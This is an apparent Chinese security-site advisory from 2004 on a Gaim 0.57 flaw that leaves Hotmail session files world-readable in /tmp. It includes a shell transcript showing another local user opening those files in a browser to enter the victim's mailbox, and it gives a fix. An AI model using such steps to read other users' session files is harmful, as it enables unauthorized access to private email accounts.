为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

利用Gaim漏洞进入别人的hotmail邮箱

2004-9-29 20:05| 投稿: security

摘要: 涉及程序:  Gaim 0.57 通讯软件客户端    描述:  利用Gaim漏洞进入别人的hotma...
涉及程序:  Gaim 0.57 通讯软件客户端    描述:  利用Gaim漏洞进入别人的hotmail邮箱    详细:  Gaim是Linux平台下一个可以模拟几大即时通讯程序的软件,其中包括MSN和AOL的即时通讯软件。    此漏洞出现在使用MSN messager的时候。因为要登录MSN,用户被要求输入hotmail的用户名和密码。建立好MSN帐号并设置Gaim每启动时都检查hotmail邮箱,这时Gaim会在/tmp目录下建立两个临时文件:    (1) 这两个文件的命名如下: file 比如: fileYbcYGF23  (2) 文件有如下权限: 4 -rw-rw-r-- 1 smackenz smackenz 978 May 12 03:01 /tmp/file984345(smackenz是Gaim的用户名)    如你所见,文件的权限设置让系统上任何一个用户都可以对这两个临时文件进行阅读。  这时如果使用系统上其他的用户登录,并进入到/tmp目录,使用浏览器打开两个临时文件的其中一个,你会发现你正进入到Gaim用户的hotmail邮箱而无需输入任何密码。    *注意*: 只有在上述Gaim用户没有关闭程序或只关闭了一段很短时间的时候,此漏洞才可被利用。可能是因为hotmail的进程id会随着时间而改变,所以Gaim一旦关闭了很久,利用此漏洞也不可能进入到hotmail的邮箱里了。    附上利用此漏洞的过程:  [smackenz@smackenz smackenz]$ ls /tmp |grep file*  [smackenz@smackenz smackenz]$ id  uid=500(smackenz) gid=500(smackenz) groups=500(smackenz)  [smackenz@smackenz smackenz]$ gaim  [smackenz@smackenz smackenz]$ ls /tmp |grep file*  file8veFxR  fileKGVdms  [smackenz@smackenz smackenz]$ su user  Password:  [user@smackenz smackenz]$ id  uid=501(user) gid=501(user) groups=501(user)  [user@smackenz user]$ ls -las /tmp/file*  4 -rw-rw-r-- 1 smackenz smackenz 978 May 12 03:11  /tmp/file8veFxR  4 -rw-rw-r-- 1 smackenz smackenz 978 May 12 03:11  /tmp/fileKGVdms  [user@smackenz user]$ cd /tmp  [user@smackenz tmp]$ ls |grep file  fileCHuvIp  fileFbpaYB  [user@smackenz tmp]$ galeon fileCHuvIp    解决方案:  一个临时的解决方法是重编译Gaim时设置好/tmp目录的权限,使其他系统用户不能读取临时文件的内容。    对此漏洞的补丁可以下面地址下载:  http://gaim.sourceforge.net/downloads.php ;   另: 在将发布的Gaim 0.58版,此漏洞将被修正。

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部